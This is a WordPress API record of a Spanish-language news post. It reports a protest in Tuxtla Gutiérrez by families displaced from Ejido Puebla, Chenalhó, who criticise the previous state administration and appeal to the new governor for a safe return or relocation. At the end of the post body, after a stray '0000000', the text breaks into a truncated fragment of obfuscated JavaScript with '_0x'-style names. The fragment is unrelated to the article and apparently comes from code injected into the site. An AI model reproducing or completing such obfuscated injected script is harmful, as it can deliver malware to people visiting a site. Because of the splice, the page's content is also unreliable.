{"id":19006,"date":"2024-11-26T05:21:09","date_gmt":"2024-11-26T05:21:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19006"},"modified":"2024-11-26T05:21:10","modified_gmt":"2024-11-26T05:21:10","slug":"confian-desplazados-que-la-nueva-era-pueda-solucionar-este-conflicto-en-chenalho","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19006","title":{"rendered":"Conf\u00edan desplazados que la Nueva ERA pueda solucionar este conflicto en Chenalh\u00f3"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732598315982-1024x683.jpg\" alt=\"\" class=\"wp-image-19007\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732598315982-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732598315982-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732598315982-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732598315982.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>25 de noviembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Desplazados de Ejido Puebla, v\u00edctimas de desplazamiento forzado interno desde hace m\u00e1s de 8 a\u00f1os, salieron a protestar en la capital chiapaneca.<\/p>\n\n\n\n<p>Denunciaron que, la voluntad y la sensibilidad para dar una soluci\u00f3n definitiva al desplazamiento; es decir, se olvid\u00f3 de las v\u00edctimas.<\/p>\n\n\n\n<p>El licenciado Leonel Inocencio Reyes Gonz\u00e1lez fue la persona encargada en darle seguimiento nuestro desplazamiento forzado.<\/p>\n\n\n\n<p>Acusaron que, lamentable es de que este funcionario en complicidad con el gobierno del estado, durante los 6 a\u00f1os se limit\u00f3 nada m\u00e1s en:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>&#8211; Aplicar una pol\u00edtica de desgaste.<\/li>\n\n\n\n<li>&#8211; Dividir a toda costa al grupo.<\/li>\n\n\n\n<li>&#8211; Financiar a las personas que nos acompa\u00f1aban, para que \u00e9l tuviera todas las facilidades de controlar al grupo. Pero, se equivocaron, estamos aqu\u00ed nuevamente fortalecido.<\/li>\n\n\n\n<li>&#8211; En construir viviendas que no re\u00fanen las condiciones como viviendas dignas, para los que buscan retornar a la comunidad.<\/li>\n\n\n\n<li>&#8211; De no considerar a todas las familias como personas desplazadas.<br>Tambi\u00e9n queremos manifestar que en nuestro grupo existe en total 61 familias desplazadas, los cuales, 34 familias han decidido retornar a la comunidad y 27 familias buscan ser reubicados, dentro de las 27 familias se encuentran las 14 familias deudos de Guadalupe Cruz Hern\u00e1ndez, asesinado al momento del desplazamiento el 26 de mayo de 2016. Las peticiones realizadas debe de solucionarse con las condiciones dignas y seguras, conforme los principios internacionales de los derechos humanos y haciendo valer los derechos como v\u00edctimas que somos.<br>Como hemos dicho, que la cuarta transformaci\u00f3n de Rutilio Escand\u00f3n Cadenas se olvid\u00f3 de nosotros, ahora, hacemos p\u00fablico que nuestra esperanza est\u00e1 en la nueva ERA<br>Nuestra esperanza est\u00e1 en la nueva ERA, porque sabemos que Eduardo Ram\u00edrez resolvi\u00f3 el tema del grupo de desplazados de 2013, y al momento de retornar estas personas, Eduardo lleg\u00f3 personalme a Ejido Puebla, Chenalh\u00f3. En ese entonces di\u00f3 una soluci\u00f3n eficaz e inmediata. Es por ello, confiamos que \u00e9l dar\u00e1 soluci\u00f3n definitiva a nuestro desplazamiento de m\u00e1s de 8 a\u00f1os.<br>De manera p\u00fablica y con mucho respeto pedimos a Eduardo Ram\u00edrez Aguilar que no se olvide de nosotros en la nueva ERA. Que no pase igual que la 4ta<br>transformaci\u00f3n de Rutilio.<br>Retorno y reubicaci\u00f3n con las condiciones dignas y seguras.<br>0000000<\/li>\n<\/ol>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 25 de noviembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Desplazados de Ejido Puebla, v\u00edctimas de desplazamiento forzado interno desde hace m\u00e1s de 8 a\u00f1os, salieron a protestar en la capital chiapaneca. Denunciaron que, la voluntad y la sensibilidad para dar una soluci\u00f3n definitiva al desplazamiento; es decir, se olvid\u00f3 de las v\u00edctimas. El licenciado &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19007,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19006","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19006","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19006"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19006\/revisions"}],"predecessor-version":[{"id":19008,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19006\/revisions\/19008"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19007"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19006"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19006"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19006"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}